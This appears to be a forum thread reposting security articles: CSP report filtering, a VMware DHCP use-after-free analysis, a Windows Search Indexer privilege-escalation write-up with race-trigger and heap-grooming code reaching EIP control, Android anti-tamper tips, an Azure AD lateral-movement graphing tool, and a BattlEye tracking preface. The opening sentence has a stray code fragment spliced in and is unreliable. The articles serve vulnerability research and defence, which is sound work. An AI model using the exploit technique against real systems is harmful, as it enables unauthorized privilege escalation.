It's not perfect, but it may be possible to group similar reports together and perform the analysis on the latest user agent. You just have to be careful not to group reports so aggressively that an attacker could smuggle XSS's that start with (() => {\n try {\n // co past detection on report-only deployments.

    Hopefully as everyone moves to very recent browsers we can just filter on the source-file. There was also a little chatter about adding the sha256-hash to the report, that would also make this infinitely more feasible (but, people would need to be on more recent versions of their browsers to send the new sha256, and by that point we'll already have the moz-extension indicator in the source-file).

    'Crowd Sourced' Labeling

Another idea that I've been mulling over is 'crowd sourced' labeling. What if people could mark reports as "unactionable" (somewhat like the csp-wtf list)? Or "this report doesn't apply to my project"? These reports could be aggregated and then displayed to other users of a report-uri endpoint as "other users have marked this report as unactionable". For people just getting started with CSP, this could be nice validation for ignoring a report.

    Or specifically if there's XSS's with a known payload, people could mark as "this was a real XSS", and other people get that indication when there's a similar report in their project.

Due to privacy/abuse concerns, this idea has been kicked down the road; it would need to be rock solid. As of right now (for Csper) there is no way for a customer to glean information about another customer, and obviously that is how things should be. But maybe in the future there could be an opt-in, anonymized feature flag for this. Not for many months at least. If this is interesting to you (whether you think it's a good idea or a terrible one, I'd love to hear your thoughts!): stuart@csper.io.

    Conclusion

A dream I have is that one day almost everyone could use Content-Security-Policy-Report-Only and get value with almost no work. If individuals are on the latest user agents, and if an endpoint's classification is good enough, websites could roll out CSP in report-only mode for a few weeks to establish a baseline of known inline reports and their positions. The endpoint would then know where the expected inline resources live, and would alert website owners only on new reports it thinks are an XSS: XSS detection for any website with almost no work.

We're not there yet. But browsers are getting better at what they send, and classification of reports is getting easier.

    I hope this was useful! If you have any ideas or comments I would love to hear them! stuart at csper.io.

    Automatically Generating Content Security Policy

    A guide to automatically generating content security policy (CSP) headers. Csper builder collection csp reports using report-uri to generate/build a policy online in minutes.

    Content Security Policy (CSP) report-uri

    Technical reference on content security policy (CSP) report-uri. Includes example csp reports, example csp report-uri policy, and payload

    Other Security Features of Content Security Policy

    Other security features of content security policy including upgrade-insecure-requests, block-all-mixed-content, frame-ancestors, sandbox, form-actions, and more

    Sursa: https://csper.io/blog/csp-report-filtering

  11. CVE-2020-3947: Use-After-Free Vulnerability in the VMware Workstation DHCP Component

    April 02, 2020 | KP Choubey

    Ever since introducing the virtualization category at Pwn2Own in 2016, guest-to-host escapes have been a highlight of the contest. This year’s event was no exception. Other guest-to-host escapes have also come through the ZDI program throughout the year. In fact, VMware released a patch for just such a bug less than a week prior to this year’s competition. In this blog post, we look into CVE-2020-3947, which was submitted to the ZDI program (ZDI-20-298) in late December by an anonymous researcher. The vulnerability affects the DHCP server component of VMware Workstation and could allow attackers to escalate privileges from a guest OS and execute code on the host OS.

    Dynamic Host Configuration Protocol (DHCP)

Dynamic Host Configuration Protocol (DHCP) is used to dynamically assign and manage IP addresses by exchanging DHCP messages between a DHCP client and server. DHCP messages include DHCPDISCOVER, DHCPOFFER, DHCPRELEASE, and several others. All DHCP messages begin with the following common header structure:

     

    Figure 1 - DHCP Header structure

    The Options field of a DHCP message contains a sequence of option fields. The structure of an option field is as follows:

     

    Figure 2 - Option Field Structure

    The optionCode field defines the type of option. The value of optionCode is 0x35 and 0x3d for the DHCP message type and client identifier options, respectively.

    A DHCP message must contain one DHCP message type option. For the DHCP message type option, the value of the optionLength field is 1 and the optionData field indicates the message type. A value of 1 indicates a DHCPDISCOVER message, while a value of 7 indicates a DHCPRELEASE message. These are the two message types that are important for this vulnerability. DHCPDISCOVER is broadcast by a client to get an IP address, and the client sends DHCPRELEASE to relinquish an IP address. 
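The option layout described above (code, length, data) can be walked with a simple loop. A sketch; the client identifier bytes here are illustrative:

```python
def parse_options(options):
    # Walk the (code, length, data) option fields of a DHCP message.
    parsed, i = {}, 0
    while i < len(options):
        code = options[i]
        if code == 0x00:          # pad option: single byte, no length field
            i += 1
            continue
        if code == 0xFF:          # end option
            break
        length = options[i + 1]
        parsed[code] = options[i + 2:i + 2 + length]
        i += 2 + length
    return parsed

# Message type option (0x35, len 1, value 7 = DHCPRELEASE) followed by a
# client identifier option (0x3d) with illustrative data.
opts = bytes([0x35, 0x01, 0x07, 0x3D, 0x03, 0x61, 0x62, 0x63, 0xFF])
print(parse_options(opts)[0x35][0])  # 7
```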

    The Vulnerability

In VMware Workstation, the vmnetdhcp.exe module provides the DHCP server service to guest machines and is installed as a Windows service. The vulnerable condition occurs when a DHCPDISCOVER message followed by a DHCPRELEASE message is sent repeatedly to a vulnerable DHCP server.

During processing of a DHCPRELEASE message, the DHCP server calls vmnetdhcp!supersede_lease (vmnetdhcp+0x3160). The supersede_lease function then copies data from one lease structure to another. A lease structure contains information such as an assigned client IP address, client hardware address, lease duration, lease status, and so on. The full lease structure is as follows:

     

    Figure 3 - Lease Structure

    For this vulnerability, the uid and uid_len fields are important. The uid field points to a buffer containing the string data from the optionData field of the client identifier option. The uid_len field indicates the size of this buffer.

supersede_lease first checks whether the string data pointed to by the respective uid fields of the source and destination leases are equal. If the two strings match, the function frees the buffer pointed to by the uid field of the source lease. Afterwards, supersede_lease calls write_lease (vmnetdhcp+0x16e0), passing the destination lease as an argument, to write the lease to an internal table.

     

    Figure 4 – Compare the uid Fields

     

    Figure 5 - Frees the uid Field

In the vulnerable condition, that is, when a DHCPDISCOVER message followed by a DHCPRELEASE message is repeatedly received by the server, the respective uid fields of the source and destination lease structures actually point to the same memory location. The supersede_lease function does not check for this condition. As a result, when it frees the memory pointed to by the uid field of the source lease, the uid pointer of the destination lease becomes a dangling pointer. Finally, when write_lease accesses the uid field of the destination lease, a use-after-free (UAF) condition occurs.

     

    Figure 6 - Triggering the Bug

    The Patch

    VMware patched this bug and two lesser severity bugs with VMSA-2020-004. The patch to address CVE-2020-3947 contains changes in one function: supersede_lease. The patch comparison of supersede_lease in VMnetDHCP.exe version 15.5.1.50853 versus version 15.5.2.54704 is as follows:

     

    Figure 7 - BinDiff Patch Comparison

    In the patched version of supersede_lease, after performing the string comparison between the respective uid fields of the source and destination leases, it performs a new check to see if the respective uid fields are actually referencing the same buffer. If they are, the function skips the call to free.
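Stripped of pointers, the patched check boils down to "free only if the contents match and the buffers are distinct objects". A rough Python analogy (the Lease class and helper are illustrative, not VMware's code):

```python
class Lease:
    def __init__(self, uid):
        self.uid = uid  # stands in for the heap-allocated uid buffer

def release_source_uid(dst, src, free):
    # Patched logic: contents matching is no longer enough; the buffers
    # must be distinct objects before the source buffer is released.
    if src.uid == dst.uid and src.uid is not dst.uid:
        free(src.uid)
        src.uid = dst.uid  # both leases now reference dst's copy
    # Pre-patch, the free happened on content equality alone, so when both
    # leases shared one buffer, dst.uid was left dangling.
```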

    Since there are no workarounds listed, the only way to ensure you are protected from this bug is to apply the patch.

Despite being a well-understood problem, UAF bugs continue to be prevalent in modern software. In fact, 15% of the advisories we published in 2019 were the result of a UAF condition. It will be interesting to see if that trend continues in 2020.

    You can find me on Twitter @nktropy, and follow the team for the latest in exploit techniques and security patches.

    Sursa: https://www.zerodayinitiative.com/blog/2020/4/1/cve-2020-3947-use-after-free-vulnerability-in-the-vmware-workstation-dhcp-component

  12. Analyzing a Windows Search Indexer LPE bug

    March 26, 2020 - SungHyun Park @ Diffense

    Introduction

    The Jan-Feb 2020 security patch fixes multiple bugs in the Windows Search Indexer.

    cve

    Many LPE vulnerabilities in the Windows Search Indexer have been found, as shown above1. Thus, we decided to analyze details from the applied patches and share them.

    Windows Search Indexer

Windows Search Indexer is a Windows service that handles the indexing of your files for Windows Search, which fuels the file search engine built into Windows, powering everything from the Start Menu search box to Windows Explorer and even the Libraries feature.

Search Indexer exposes its service interface to users through a GUI, Indexing Options, as shown below.

    indexing_option

All the DB files and temporary data produced during the indexing process are stored and managed as files. As is usual for a Windows service, the whole process runs with NT AUTHORITY\SYSTEM privileges. If logic bugs exist in the handling of file paths, they may enable privilege escalation (e.g., a symlink attack).

We assumed Search Indexer might contain that kind of vulnerability, given that most of the vulnerabilities recently found in Windows services were LPE vulnerabilities caused by logic bugs. However, the outcome of our analysis was different; more details are covered below.

    Patch Diffing

The analysis environment was Windows 7 x86, since the updated file there was small and the differences were easy to spot. We downloaded both patched versions of this module.

    They can be downloaded from Microsoft Update Catalog :

    • patched version (January Patch Tuesday) : KB45343142
    • patched version (February Patch Tuesday) : KB45378133

    We started with a BinDiff of the binaries modified by the patch (in this case there is only one: searchindexer.exe)

    diffing_2

Most of the patches were in the CSearchCrawlScopeManager and CSearchRoot classes. The former was patched in January, and the latter the following month. Both classes contained the same change, so we focused on the CSearchRoot patch.

The following figure shows that code was added to use a lock to safely access shared resources. Since the patch consists of getter and setter functions, we deduced that access to these shared resources gave rise to a race condition vulnerability.

    image

    image

    How to Interact with the Interface

We referred to MSDN to see how those classes were used and found that they were all related to the Crawl Scope Manager, which let us check the class's method information.

    And the MSDN said4 :

    The Crawl Scope Manager (CSM) is a set of APIs that lets you add, remove, and enumerate search roots and scope rules for the Windows Search indexer. When you want the indexer to begin crawling a new container, you can use the CSM to set the search root(s) and scope rules for paths within the search root(s).

    The CSM interface is as follows:

For example, adding, removing, and enumerating search roots and scope rules can be written as follows:

    The ISearchCrawlScopeManager tells the search engine about containers to crawl and/or watch, and items under those containers to include or exclude. To add a new search root, instantiate an ISearchRoot object, set the root attributes, and then call ISearchCrawlScopeManager::AddRoot and pass it a pointer to ISearchRoot object.

    // Add RootInfo & Scope Rule
    pISearchRoot->put_RootURL(L"file:///C:\\");
    pSearchCrawlScopeManager->AddRoot(pISearchRoot);
    pSearchCrawlScopeManager->AddDefaultScopeRule(L"file:///C:\\Windows", fInclude, FF_INDEXCOMPLEXURLS);
    
    // Set Registry key
    pSearchCrawlScopeManager->SaveAll(); 
    

    We can also use ISearchCrawlScopeManager to remove a root from the crawl scope when we no longer want that URL indexed. Removing a root also deletes all scope rules for that URL. We can uninstall the application, remove all data, and then remove the search root from the crawl scope, and the Crawl Scope Manager will remove the root and all scope rules associated with the root.

    // Remove RootInfo & Scope Rule
    ISearchCrawlScopeManager->RemoveRoot(pszURL);
    
    // Set Registry key
    ISearchCrawlScopeManager->SaveAll(); 
    

    The CSM enumerates search roots using IEnumSearchRoots. We can use this class to enumerate search roots for a number of purposes. For example, we might want to display the entire crawl scope in a user interface, or discover whether a particular root or the child of a root is already in the crawl scope.

    // Display RootInfo
    PWSTR pszUrl = NULL;
    pSearchRoot->get_RootURL(&pszUrl);
    wcout << L"\t" << pszUrl;
    
    // Display Scope Rule
    IEnumSearchScopeRules *pScopeRules;
    pSearchCrawlScopeManager->EnumerateScopeRules(&pScopeRules);
    
    ISearchScopeRule *pSearchScopeRule;
    pScopeRules->Next(1, &pSearchScopeRule, NULL);
    
    pSearchScopeRule->get_PatternOrURL(&pszUrl);
    wcout << L"\t" << pszUrl;
    

    We suspected that a vulnerability would arise in the process of manipulating the URL. Accordingly, we started analyzing the root cause.

    Root Cause Analysis

    We conducted binary analysis focusing on the following functions:

    While analyzing ISearchRoot::put_RootURL and ISearchRoot::get_RootURL, we figured out that the object’s shared variable (CSearchRoot + 0x14) was referenced.

    The put_RootURL function wrote user-controlled data to the memory at CSearchRoot+0x14, and the get_RootURL function read the data located there. Given the patch, it appeared that the vulnerability was caused by this shared variable.

    image

    image

    Thus, we finally got to the point where the vulnerability initiated.

    The vulnerability lay in the process of double-fetching a length, and could be triggered when the following occurs:

    1. First fetch: Used as memory allocation size (line 9)
    2. Second fetch: Used as memory copy size (line 13)

    image

    If the sizes of the first and second fetches differed, a heap overflow could occur, especially when the second fetch returned a larger size. We needed to change the size of pszUrl through the race condition before the memory copy occurred.
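    The pattern can be illustrated with a portable, single-threaded C++ sketch (names are ours, not from the binary; the racing putter thread is modeled by a callback that mutates the shared string between the two fetches, which is exactly the window the real race hits):

    ```cpp
    #include <cstddef>
    #include <string>

    // Shared state that the patch later guards with a lock.
    struct SharedRoot {
        std::wstring url;  // stands in for the buffer at CSearchRoot+0x14
    };

    // Models get_RootURL: the length is fetched twice, once for the allocation
    // and once for the copy. The 'race' callback stands in for the putter
    // thread winning the race between the two fetches.
    std::size_t vulnerable_get(SharedRoot& root, void (*race)(SharedRoot&)) {
        std::size_t alloc_len = root.url.size();    // first fetch: allocation size
        wchar_t* out = new wchar_t[alloc_len + 1];  // buffer sized from first fetch
        race(root);                                 // the racing writer lands here
        std::size_t copy_len = root.url.size();     // second fetch: copy size
        // A safe implementation would copy alloc_len; copying copy_len instead
        // overflows 'out' whenever copy_len > alloc_len.
        std::size_t overflow = copy_len > alloc_len ? copy_len - alloc_len : 0;
        delete[] out;
        return overflow;  // how many wchar_t would land out of bounds
    }
    ```

    Growing the string from L"AA" to L"AAAAAAAAAA" between the fetches leaves an 8-character shortfall, which is the overflow the putter/getter thread pair below provokes for real.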

    Crash

    Through OleView, we were able to see the interface provided by the Windows Search Manager, and we needed to hit the vulnerable functions through the methods of that interface.

    image

    We could easily test it through the COM-based command-line source code provided by MSDN, and wrote a COM client that hits the vulnerable functions as follows:

    int wmain(int argc, wchar_t *argv[])
    {
        // Initialize COM library
        CoInitializeEx(NULL, COINIT_APARTMENTTHREADED | COINIT_DISABLE_OLE1DDE);
    
        // Class instantiate
        ISearchRoot *pISearchRoot;
        CoCreateInstance(CLSID_CSearchRoot, NULL, CLSCTX_ALL, IID_PPV_ARGS(&pISearchRoot));
    
        // Vulnerable functions hit
        pISearchRoot->put_RootURL(L"Shared RootURL");
        PWSTR pszUrl = NULL;
    HRESULT hr = pISearchRoot->get_RootURL(&pszUrl);
        wcout << L"\t" << pszUrl;
        CoTaskMemFree(pszUrl);
    
        // Free COM resource, End
        pISearchRoot->Release();
        CoUninitialize();
    }
    

    Thereafter, bug triggering was quite simple. We created two threads: one writing different lengths of data to the shared buffer and the other reading data from the shared buffer at the same time.

    DWORD __stdcall thread_putter(LPVOID param)
    {
    	ISearchRoot *pISearchRoot = (ISearchRoot*)param;
    	while (1) {
    		pISearchRoot->put_RootURL(L"AA");
    		pISearchRoot->put_RootURL(L"AAAAAAAAAA");
    	}
    	return 0;
    }
    
    DWORD __stdcall thread_getter(LPVOID param)
    {
    	ISearchRoot *pISearchRoot = (ISearchRoot*)param;
    	PWSTR get_pszUrl;
    	while (1) {
    		pISearchRoot->get_RootURL(&get_pszUrl);
    	}
    	return 0;
    }
    

    Okay, Crash!

    image

    Undoubtedly, the race condition had succeeded before the StringCchCopyW function copied the RootURL data, leading to a heap overflow.

    EIP Control

    We needed to place an object on the server heap, where the vulnerability occurs, for the sake of controlling EIP.

    We wrote the client code as follows, tracking the heap status.

    int wmain(int argc, wchar_t *argv[])
    {
        CoInitializeEx(NULL, COINIT_MULTITHREADED | COINIT_DISABLE_OLE1DDE);
        ISearchRoot *pISearchRoot[20];
        for (int i = 0; i < 20; i++) {
            CoCreateInstance(CLSID_CSearchRoot, NULL, CLSCTX_LOCAL_SERVER, IID_PPV_ARGS(&pISearchRoot[i]));
        }
        pISearchRoot[3]->Release();
        pISearchRoot[5]->Release();
        pISearchRoot[7]->Release();
        pISearchRoot[9]->Release();
        pISearchRoot[11]->Release();
    
        
        CreateThread(NULL, 0, thread_putter, (LPVOID)pISearchRoot[13], 0, NULL);
        CreateThread(NULL, 0, thread_getter, (LPVOID)pISearchRoot[13], 0, NULL);
        Sleep(500);
        
        CoUninitialize();
        return 0;
    }
    

    We found out that if the client did not release the pISearchRoot object, IRpcStubBuffer objects would remain on the server heap. And we also saw that the IRpcStubBuffer object remained near the location of the heap where the vulnerability occurred.

        0:010> !heap -p -all
        ...
        03d58f10 0005 0005  [00]   03d58f18    0001a - (busy)     <-- CoTaskMalloc return
        	mssprxy!_idxpi_IID_Lookup <PERF> (mssprxy+0x75)
        03d58f38 0005 0005  [00]   03d58f40    00020 - (free)
        03d58f60 0005 0005  [00]   03d58f68    0001c - (busy)     <-- IRpcStubBuffer Obj
          ? mssprxy!_ISearchRootStubVtbl+10
        03d58f88 0005 0005  [00]   03d58f90    0001c - (busy)
          ? mssprxy!_ISearchRootStubVtbl+10                       <-- IRpcStubBuffer Obj
        03d58fb0 0005 0005  [00]   03d58fb8    00020 - (busy)
        03d58fd8 0005 0005  [00]   03d58fe0    0001c - (busy)
          ? mssprxy!_ISearchRootStubVtbl+10                       <-- IRpcStubBuffer Obj
        03d59000 0005 0005  [00]   03d59008    0001c - (busy)
          ? mssprxy!_ISearchRootStubVtbl+10                       <-- IRpcStubBuffer Obj
        03d59028 0005 0005  [00]   03d59030    00020 - (busy)
        03d59050 0005 0005  [00]   03d59058    00020 - (busy)
        03d59078 0005 0005  [00]   03d59080    00020 - (free)
        03d590a0 0005 0005  [00]   03d590a8    00020 - (free)
        03d590c8 0005 0005  [00]   03d590d0    0001c - (busy)
          ? mssprxy!_ISearchRootStubVtbl+10                       <-- IRpcStubBuffer Obj
    

    In COM, all interfaces have their own interface stub space. Stubs are small memory spaces used to support remote method calls during RPC communication, and IRpcStubBuffer is the primary interface for such interface stubs. In this process, the IRpcStubBuffer to support pISearchRoot’s interface stub remains on the server’s heap.

    The vtable of IRpcStubBuffer is as follows:

        0:003> dds poi(03d58f18) l10
        71215bc8  7121707e mssprxy!CStdStubBuffer_QueryInterface
        71215bcc  71217073 mssprxy!CStdStubBuffer_AddRef
        71215bd0  71216840 mssprxy!CStdStubBuffer_Release
        71215bd4  71217926 mssprxy!CStdStubBuffer_Connect
        71215bd8  71216866 mssprxy!CStdStubBuffer_Disconnect <-- client call : CoUninitialize();
        71215bdc  7121687c mssprxy!CStdStubBuffer_Invoke
        71215be0  7121791b mssprxy!CStdStubBuffer_IsIIDSupported
        71215be4  71217910 mssprxy!CStdStubBuffer_CountRefs
        71215be8  71217905 mssprxy!CStdStubBuffer_DebugServerQueryInterface
        71215bec  712178fa mssprxy!CStdStubBuffer_DebugServerRelease
    

    When the client’s COM is uninitialized, IRpcStubBuffer::Disconnect disconnects all connections of the object pointer. Therefore, if the client calls the CoUninitialize function, the CStdStubBuffer_Disconnect function is called on the server. This means an attacker can construct a fake vtable and have that function called through it.
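    The hijack can be sketched in portable C++ (our own, hypothetical layout; in the real exploit the heap overflow supplies the corrupted pointer, 0x45454545, and the client's CoUninitialize drives the virtual Disconnect call on the server):

    ```cpp
    namespace {
    int g_hits = 0;
    void attacker_payload() { ++g_hits; }  // stands in for arbitrary attacker code
    void real_disconnect() {}

    // Minimal stand-in for a COM stub object: the first pointer-sized field
    // is the vtable pointer, and Disconnect occupies a fixed slot in it.
    struct Vtbl { void (*Disconnect)(); };
    struct StubBuffer { const Vtbl* vtbl; };
    }

    // Returns true if the hijacked virtual dispatch reached the payload.
    bool demo_vtable_hijack() {
        static const Vtbl real_vtbl{ real_disconnect };
        static const Vtbl fake_vtbl{ attacker_payload };

        StubBuffer stub{ &real_vtbl };

        // The heap overflow overwrites the neighboring object's vtable pointer
        // with an attacker-controlled value; here the corruption is modeled as
        // a direct assignment.
        stub.vtbl = &fake_vtbl;

        // When the client calls CoUninitialize, the server dispatches
        // IRpcStubBuffer::Disconnect through the (now fake) vtable.
        stub.vtbl->Disconnect();
        return g_hits == 1;
    }
    ```

    The point of the sketch is that once the first field of the object is attacker-controlled, any virtual call the server makes on it becomes an indirect call to an attacker-chosen address.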

    However, IRpcStubBuffer was not always allocated at the same heap location, so several tries were needed to construct the heap layout. After several attempts, the IRpcStubBuffer object was covered with a controllable value (0x45454545) as follows.

    In the end, we could show that indirect calls to any function in memory are possible!

    image

    Conclusion

    Most of the LPE vulnerabilities recently found in Windows services were logic bugs, which made this analysis of a memory corruption vulnerability in Windows Search Indexer quite interesting. Such memory corruption vulnerabilities are likely to occur in Windows services hereafter, and we should not overlook the possibility.

    We hope that the analysis will serve as an insight to other vulnerability researchers and be applied to further studies.


  13. Protecting your Android App against Reverse Engineering and Tampering

    Apr 2 · 4 min read
     

    I built a premium (paid) android app that has been cracked and modded. Therefore, I started researching ways to secure my code and make it more difficult to modify my app.

    Before I continue: you cannot eliminate these issues or completely prevent people from breaking your app. All you can do is make it somewhat more difficult to get in and understand your code.

    I wrote this article because I felt that the only sources of information simply said it was nearly impossible to protect your app, and that you should just not leave secrets on the client device. That is partly true, but I wanted to compile sources that can actually assist independent developers like me. Lastly, when you search “android reverse engineer”, all the results are about cracking other people’s apps; there are almost no sources on how to protect your own.

    So here are some useful blogs and libraries that have helped me make my code more tamper-resistant. Several less popular sources are included in the list below to help you!

    This article is geared towards new android developers or ones who haven’t really dealt with reverse engineering and mods before.

    Proguard:

    This is built into android studio and serves several purposes. The first one is code obfuscation, basically turning your code into gibberish to make it difficult to understand. This can easily be beaten, but it is super simple to add to your app so I still recommend implementing it.

    The second function is code shrinking, which is still relevant to this article. Basically, it removes unused resources and code. I wouldn’t rely on this, but it is included by default and worth implementing. The only way of actually checking if it changed anything is by reverse engineering your own APK.
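    Enabling both obfuscation and shrinking is a standard change in the module-level build.gradle (your keep rules go in proguard-rules.pro):

    ```groovy
    android {
        buildTypes {
            release {
                minifyEnabled true       // obfuscation + code shrinking
                shrinkResources true     // strip unused resources
                proguardFiles getDefaultProguardFile('proguard-android-optimize.txt'),
                              'proguard-rules.pro'
            }
        }
    }
    ```

    Note that on current Android Gradle Plugin versions this actually runs R8, which implements the ProGuard rule format.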

    Dexguard:

    A commercial tool made by the same team as Proguard. I haven’t used it myself, so I can’t vouch for it.

    It includes everything that Proguard has and adds more features. Some notable additions are String and Resource Encryption.

    Android NDK:

    Writing parts of your app in native code (C or C++) will certainly deter people from reverse engineering it. There are downsides to using the NDK, such as performance overhead from JNI calls, and you can introduce bugs down the line that are harder to track. You’ll also have to manage memory yourself, which isn’t trivial for beginners.

    PiracyChecker:

    A popular library on GitHub with some basic ways to mitigate reverse engineering. I included this in one of my apps, but it has already been cracked. There are multiple checks you can run, including an implementation of the Google Play Licensing check (LVL). It is open source, so you can look at the code and contribute too!

    I am using Google Play app signing, so I couldn’t actually use the APK signature to verify that I signed the app, or even that Google did ;(

    Google’s SafetyNet Attestation API:

    This is an amazing option, though I haven’t tested it thoroughly. Basically, you call Google’s Attestation API and it tells you whether the device the app is running on is secure: for instance, whether it is rooted or running LuckyPatcher.

    Deguard:

    This is a website I stumbled upon. You upload an APK file, and it uses algorithms to reverse what ProGuard does. You can then open classes, sometimes with full class names too! I used this to pull some modded versions of my app and see, more or less, what had been changed. There are manual ways to achieve similar results, but this is faster and requires less work.

    http://apk-deguard.com/

    Android Anti-Reversing Defenses:

    This blog post explains some great defenses to put up against hackers/reverse engineering. I suggest reading it and implementing at least one or two of the methods used. There are code snippets too!

    Android Security: Adding Tampering Detection to Your App:

    Another great article, also with code snippets, about how to protect your app. This piece also includes great explanations of how each method works.

    https://www.airpair.com/android/posts/adding-tampering-detection-to-your-android-app

    MobSF:

    I heard about this from an Android reverse engineering talk I was watching on YouTube; they mentioned this amazing tool in passing. I had never heard of it before but decided to go ahead and test it out. It works on Windows, Linux, and Mac. In short, you run it locally, upload an APK (no AABs yet), and it analyzes it for vulnerabilities. It performs basic checks and shows you a lot of information about an APK, like who signed the cert, app permissions, all the strings, and much more!

    I had some issues installing it, but the docs are good and they have a slack channel which came in handy.

    https://github.com/MobSF/Mobile-Security-Framework-MobSF


    Overall, there are several ways to make your app more difficult to crack. I’d recommend that your app should call an API rather than do the checks locally. It is much easier to modify code on the client rather than on the server.

    Let me know if I missed anything, and if you have more ideas!


  14. What is AzureADLateralMovement

    AzureADLateralMovement builds a lateral movement graph for Azure Active Directory entities: users, computers, groups, and roles. Using the Microsoft Graph API, AzureADLateralMovement extracts interesting information and builds JSON files containing lateral movement graph data compatible with BloodHound 2.2.0.

    Some of the implemented features are:

    • Extraction of Users, Computers, Groups, Roles and more.
    • Transform the entities to Graph objects
    • Inject the object to Azure CosmosDB Graph

    LMP.png Explanation: Terry Jeffords is a member of Device Administrators. This group is admin on all AAD-joined machines, including Desktop-RGR29LI, where the user Amy Santiago has logged in within the last 2 hours and probably still has a session. This attack path can be exploited manually or with automated tools.

    Architecture

    The toolkit consists of several components

    MicrosoftGraphApi Helper

    The MicrosoftGraphApi Helper is responsible for retrieving the required data from the Graph API

    BloodHound Helper

    Responsible for creating JSON files that can be dropped into BloodHound 2.2.0 to extend the covered organization entities
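    As a rough, hypothetical sketch of the kind of ingest JSON involved (field names are illustrative only, not taken from the project; consult the BloodHound wiki for the exact schema):

    ```json
    {
      "computers": [
        {
          "Name": "DESKTOP-RGR29LI",
          "LocalAdmins": [ { "Name": "Device Administrators", "Type": "Group" } ],
          "Sessions": [ { "UserName": "amy.santiago@contoso.com", "ComputerName": "DESKTOP-RGR29LI" } ]
        }
      ],
      "meta": { "type": "computers", "count": 1 }
    }
    ```

    Dropping files of this shape onto the BloodHound UI is what lets it draw the AdminTo/MemberOf/HasSession edges described later.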

    CosmosDbGraph Helper

    In case you prefer using the Azure CosmosDB service instead of the BloodHound client, this module will push the retrieved data into a graph database service

    How to set up

    Steps

    1. Download, compile and run
    2. Browse to http://localhost:44302
    3. Logon with AAD administrative account
    4. Click on "AzureActiveDirectoryLateralMovement" to retrieve data
    5. Drag the json file into BloodHound 2.2.0

    DragAndDrop.png

    Configuration

    An example configuration as below :

    {
      "AzureAd": {
        "CallbackPath": "/signin-oidc",
        "BaseUrl": "https://localhost:44334",
        "Scopes": "Directory.Read.All AuditLog.Read.All",
        "ClientId": "<ClientId>",
        "ClientSecret": "<ClientSecret>",
        "GraphResourceId": "https://graph.microsoft.com/",
        "GraphScopes": "Directory.Read.All AuditLog.Read.All"
      },
      "Logging": {
        "IncludeScopes": false,
        "LogLevel": {
          "Default": "Warning"
        }
      },
      "CosmosDb": {
        "EndpointUrl": "https://<CosmosDbGraphName>.documents.azure.com:443/",
        "AuthorizationKey": "<AuthorizationKey>"
      } 
    }
    

    Deployment

    Before start using this tool you need to create an Application on the Azure Portal. Go to Azure Active Directory -> App Registrations -> Register an application.

    registerapp.png

    After creating the application, copy the Application ID and change it on AzureOauth.config.

    The URL (external listener) that will be used for the application should be added as a Redirect URL. To add a redirect URL, go to the application and click Add a Redirect URL.

    redirecturl.png

    The Redirect URL should be the URL that will be used to host the application endpoint, in this case https://localhost:44302/

    url.png

    Make sure to check both the boxes as shown below :

    implicitgrant.png

    Security Considerations

    The lateral movement graph allows investigating the attack paths truly available in the AAD environment. The graph consists of nodes for users, groups, and devices, with edges connecting them by the logic of "AdminTo", "MemberOf", and "HasSession". This logic is explained in detail in the original research documentation: https://github.com/BloodHoundAD/Bloodhound/wiki

    In the on-premise environment, BloodHound collects data using the SAMR and SMB protocols against each machine in the domain, and LDAP against the on-premise AD.

    In Azure AD environment, the relevant data regarding Azure AD device, users and logon sessions can be retrieved using Microsoft Graph API. Once the relevant data is gathered it is possible to build similar graph of connections for users, groups and Windows machines registered in the Azure Active Directory.

    To retrieve the data and build the graph, this project uses: an Azure app, the Microsoft Graph API, a hybrid AD+AAD domain environment synced using pass-through authentication, and the BloodHound UI and entity objects.
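    Given the Directory.Read.All and AuditLog.Read.All scopes in the configuration above, the Graph endpoints involved would plausibly include the following (an illustrative list, not taken from the project's source):

    ```
    GET https://graph.microsoft.com/v1.0/devices             # AAD-joined devices
    GET https://graph.microsoft.com/v1.0/users               # users
    GET https://graph.microsoft.com/v1.0/groups              # groups and memberships
    GET https://graph.microsoft.com/v1.0/directoryRoles      # administrative roles
    GET https://graph.microsoft.com/v1.0/auditLogs/signIns   # sign-in events (AuditLog.Read.All)
    ```

    The sign-in log is what makes the HasSession edges possible without touching the machines themselves.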

    implicitgrant.png

    The AAD graph is based on the following data

    Devices - AAD-joined Windows devices only, and their owners

    Users - All AD or AAD users

    Administrative roles and Groups - All memberships of roles and groups

    Local Admin - The following are default local admins in AAD joined device - Global administrator role - Device administrator role - The owner of the machine

    Sessions - All logins for Windows machines

    References

    Exploring graph queries on top of Azure Cosmos DB with Gremlin https://github.com/talmaor/GraphExplorer SharpHound - The C# Ingestor https://github.com/BloodHoundAD/BloodHound/wiki/Data-Collector Quickstart: Build a .NET Framework or Core application using the Azure Cosmos DB Gremlin API account https://docs.microsoft.com/en-us/azure/cosmos-db/create-graph-dotnet How to: Use the portal to create an Azure AD application and service principal that can access resources https://docs.microsoft.com/en-us/azure/active-directory/develop/howto-create-service-principal-portal

     

    Source: https://github.com/talmaor/AzureADLateralMovement

  15. Mar 31, 2020 :: vmcall :: [ battleye, anti-cheats, game-hacking ]

    BattlEye reverse engineer tracking

    Preface

    Modern commercial anti-cheats face increasing competitiveness in professional game-hack production, and have thus begun implementing questionable methods to counter it. In this article, we present a previously unknown anti-cheat module, pushed to a small fraction of the player base by the commercial anti-cheat BattlEye. Because the module is pushed dynamically, the prevalent theory is that it specifically targets reverse engineers, to monitor the production of video game hacking tools.

    Shellcode [1]

    [1] Shellcode refers to independent code that is dynamically loaded into a running process.

    The code snippets in this article are beautified decompilations of shellcode [1] that we’ve dumped and deobfuscated from BattlEye. The shellcode was pushed to my development machine while messing around in Escape from Tarkov. On this machine various reverse engineering applications such as x64dbg are installed and frequently running, which might’ve caught the attention of the anti-cheat in question. To confirm the suspicion, a secondary machine that is mainly used for testing was booted, and on it, Escape from Tarkov was installed. The shellcode in question was not pushed to the secondary machine, which runs on the same network and utilized the same game account as the development machine.

    Other members of Secret Club have experienced the same ordeal, and the common denominator is that we are all highly specialized reverse engineers, most of whom have the same applications installed. To put a nail in the coffin, I asked a few of my high school classmates to let me log shellcode activity (using a hypervisor) on their machines while playing Escape from Tarkov, and not a single one of them received the module in question. Needless to say, some kind of technical minority is being targeted, as the following code segments will show.

    Context

    In this article, you will see references to a function called battleye::send. This function is used by the commercial anti-cheat to send information from the client module BEClient_x64/x86.dll inside of the game process, to the respective game server. This is to be interpreted as a pure “send data over the internet” function, and only takes a buffer as input. The ID in each report header determines the type of “packet”, which can be used to distinguish packets from one another.
